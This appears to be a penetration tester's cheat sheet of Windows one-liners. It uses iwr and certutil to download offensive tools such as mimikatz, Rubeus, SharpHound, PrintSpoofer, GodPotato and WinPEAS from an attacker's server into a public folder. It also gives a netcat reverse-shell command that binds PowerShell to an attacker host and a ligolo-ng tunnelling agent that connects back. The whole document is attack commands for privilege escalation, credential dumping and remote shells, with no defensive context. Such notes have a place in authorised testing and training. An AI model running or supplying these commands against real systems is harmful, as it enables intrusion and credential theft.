Windows
GodPotato
iwr -Uri "http://127.0.0.1:8000/GodPotato-NET4.exe" -Outfile "c:\Users\Public\Downloads\GodPotato-NET4.exe"certutil.exe -urlcache -f "http://127.0.0.1:8000/GodPotato-NET4.exe" "c:\Users\Public\Downloads\GodPotato-NET4.exe"WinPEAS
iwr -Uri "http://127.0.0.1:8000/peass/winpeas/winPEASx64.exe" -Outfile "c:\Users\Public\Downloads\winPEASx64.exe"certutil.exe -urlcache -f "http://127.0.0.1:8000/peass/winpeas/winPEASx64.exe" "c:\Users\Public\Downloads\winPEASx64.exe"Ligolo NG 64
iwr -Uri "http://127.0.0.1:8000/ligolo-ng/agent.exe" -Outfile "c:\Users\Public\Downloads\ligolo-agent.exe"certutil.exe -urlcache -f "http://127.0.0.1:8000/ligolo-ng/agent.exe" "c:\Users\Public\Downloads\ligolo-agent.exe"c:\Users\Public\Downloads\ligolo-agent.exe -connect {% $dollarattacker.host %}:9001 -ignore-cert -retrymimikatz (64bit)
iwr -Uri "http://127.0.0.1:8000/mimikatz/x64/mimikatz.exe" -Outfile "c:\Users\Public\Downloads\mimikatz.exe"certutil.exe -urlcache -f "http://127.0.0.1:8000/mimikatz/x64/mimikatz.exe" "c:\Users\Public\Downloads\mimikatz.exe"nc
iwr -Uri "http://127.0.0.1:8000/nc.exe" -Outfile "c:\Users\Public\Downloads\nc.exe"certutil.exe -urlcache -f "http://127.0.0.1:8000/nc.exe" "c:\Users\Public\Downloads\nc.exe"Usage
c:\Users\Public\Downloads\nc.exe -e powershell.exe {% $dollarattacker.host %} {% $dollarattacker.shell.port %}powercat
iwr -Uri "http://127.0.0.1:8000/powercat.ps1" -Outfile "c:\Users\Public\Downloads\powercat.ps1"certutil.exe -urlcache -f "http://127.0.0.1:8000/powercat.ps1" "c:\Users\Public\Downloads\powercat.ps1"PowerUp
iwr -Uri "http://127.0.0.1:8000/PowerUp.ps1" -Outfile "c:\Users\Public\Downloads\PowerUp.ps1"certutil.exe -urlcache -f "http://127.0.0.1:8000/PowerUp.ps1" "c:\Users\Public\Downloads\PowerUp.ps1"PowerView
iwr -Uri "http://127.0.0.1:8000/PowerView.ps1" -Outfile "c:\Users\Public\Downloads\PowerView.ps1"certutil.exe -urlcache -f "http://127.0.0.1:8000/PowerView.ps1" "c:\Users\Public\Downloads\PowerView.ps1"PrintSpoofer64
iwr -Uri "http://127.0.0.1:8000/PrintSpoofer64.exe" -Outfile "c:\Users\Public\Downloads\PrintSpoofer64.exe"certutil.exe -urlcache -f "http://127.0.0.1:8000/PrintSpoofer64.exe" "c:\Users\Public\Downloads\PrintSpoofer64.exe"Rubeus
iwr -Uri "http://127.0.0.1:8000/Rubeus.exe" -Outfile "c:\Users\Public\Downloads\Rubeus.exe"certutil.exe -urlcache -f "http://127.0.0.1:8000/Rubeus.exe" "c:\Users\Public\Downloads\Rubeus.exe"Seatbelt
iwr -Uri "http://127.0.0.1:8000/Seatbelt.exe" -Outfile "c:\Users\Public\Downloads\Seatbelt.exe"certutil.exe -urlcache -f "http://127.0.0.1:8000/Seatbelt.exe" "c:\Users\Public\Downloads\Seatbelt.exe"SharpHound.ps1
iwr -Uri "http://127.0.0.1:8000/SharpHound.ps1" -Outfile "c:\Users\Public\Downloads\SharpHound.ps1"certutil.exe -urlcache -f "http://127.0.0.1:8000/SharpHound.ps1" "c:\Users\Public\Downloads\SharpHound.ps1"Watch-Command.ps1
iwr -Uri "http://127.0.0.1:8000/Watch-Command.ps1" -Outfile "c:\Users\Public\Downloads\Watch-Command.ps1"certutil.exe -urlcache -f "http://127.0.0.1:8000/Watch-Command.ps1" "c:\Users\Public\Downloads\Watch-Command.ps1"